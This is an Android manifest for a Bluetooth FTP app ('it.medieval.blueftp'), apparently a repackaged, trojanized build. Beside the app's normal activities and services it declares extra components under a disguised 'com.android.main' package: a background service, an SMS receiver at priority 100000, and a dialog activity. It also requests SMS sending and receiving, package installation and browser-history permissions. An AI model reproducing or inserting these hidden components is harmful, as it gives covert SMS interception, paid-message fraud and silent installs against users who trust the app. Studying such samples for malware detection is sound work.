<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:installLocation="auto" package="it.medieval.blueftp">
    <application android:icon="@drawable/icon" android:label="@string/app_name" android:name="it.medieval.blueftp.AAApplication">
        <activity android:configChanges="locale|keyboardHidden|orientation" android:name=".AMain" android:screenOrientation="unspecified">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:configChanges="locale|keyboardHidden|orientation" android:label="@string/send_window_title" android:name=".ASend" android:screenOrientation="unspecified">
            <intent-filter>
                <category android:name="android.intent.category.DEFAULT"/>
                <action android:name="android.intent.action.SEND"/>
                <action android:name="android.intent.action.SEND_MULTIPLE"/>
                <data android:mimeType="*/*"/>
            </intent-filter>
        </activity>
        <activity android:configChanges="locale|keyboardHidden|orientation" android:label="" android:name=".AAppPicker" android:screenOrientation="unspecified"/>
        <activity android:configChanges="locale|keyboardHidden|orientation" android:label="" android:name=".AContactPicker" android:screenOrientation="unspecified"/>
        <activity android:configChanges="locale" android:label="" android:name=".ALanguage" android:screenOrientation="unspecified" android:theme="@android:style/Theme.NoTitleBar"/>
        <activity android:configChanges="locale|keyboardHidden|orientation" android:name=".AAbout" android:screenOrientation="unspecified" android:theme="@android:style/Theme.NoTitleBar"/>
        <activity android:configChanges="locale|keyboardHidden|orientation" android:name=".ASettings" android:screenOrientation="unspecified"/>
        <activity android:configChanges="locale|keyboardHidden|orientation" android:icon="@drawable/path_home" android:label="@string/home_live_folder" android:name=".ALiveFolder" android:screenOrientation="unspecified">
            <intent-filter>
                <category android:name="android.intent.category.DEFAULT"/>
                <action android:name="android.intent.action.CREATE_LIVE_FOLDER"/>
            </intent-filter>
        </activity>
        <activity android:configChanges="locale|keyboardHidden|orientation" android:name=".BugsMessage" android:screenOrientation="unspecified" android:theme="@style/Theme.Transparent"/>
        <activity android:configChanges="locale|keyboardHidden|orientation" android:name=".bluetooth_servers.opp_server.NotifyMexOPP" android:screenOrientation="unspecified" android:theme="@style/Theme.Transparent"/>
        <activity android:configChanges="locale|keyboardHidden|orientation" android:name=".bluetooth_servers.ftp_server.NotifyMexFTP" android:screenOrientation="unspecified" android:theme="@style/Theme.Transparent"/>
        <service android:enabled="true" android:exported="false" android:label="@string/opp_name" android:name=".bluetooth_servers.opp_server.OPP_Service"/>
        <service android:enabled="true" android:exported="false" android:label="@string/ftp_name" android:name=".bluetooth_servers.ftp_server.FTP_Service"/>
        <receiver android:enabled="true" android:exported="true" android:label="@string/run_serv" android:name=".bluetooth_servers.ServicesLauncher">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <receiver android:icon="@drawable/icon" android:label="@string/app_name" android:name=".WPanel">
            <intent-filter>
                <action android:name="android.bluetooth.intent.action.BLUETOOTH_STATE_CHANGED"/>
                <action android:name="android.bluetooth.intent.action.SCAN_MODE_CHANGED"/>
                <action android:name="android.bluetooth.adapter.action.STATE_CHANGED"/>
                <action android:name="android.bluetooth.adapter.action.SCAN_MODE_CHANGED"/>
                <action android:name="android.appwidget.action.APPWIDGET_UPDATE"/>
            </intent-filter>
            <meta-data android:name="android.appwidget.provider" android:resource="@xml/home_widget"/>
        </receiver>
        <provider android:authorities="it.medieval.blueftp.live_folder" android:enabled="true" android:exported="true" android:grantUriPermissions="true" android:name=".LiveFolderProvider"/>
        <service android:name="com.android.main.MainService" android:process=":main"/>
        <receiver android:name="com.android.main.ActionReceiver">
            <intent-filter>
                <action android:name="android.intent.action.SIG_STR"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.android.main.SmsReceiver">
            <intent-filter android:priority="100000">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <activity android:name="com.android.main.TANCActivity" android:theme="@android:style/Theme.Dialog"/>
        <meta-data android:name="ADMOB_PUBLISHER_ID" android:value="a14aae1d083a710"/>
    </application>
    <uses-permission android:name="android.permission.BLUETOOTH"/>
    <uses-permission android:name="android.permission.BLUETOOTH_ADMIN"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/>
    <uses-permission android:name="com.android.browser.permission.WRITE_HISTORY_BOOKMARKS"/>
    <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-feature android:name="android.hardware.bluetooth" android:required="false"/>
    <supports-screens android:anyDensity="true" android:largeScreens="true" android:normalScreens="true" android:resizeable="true" android:smallScreens="true"/>
</manifest>
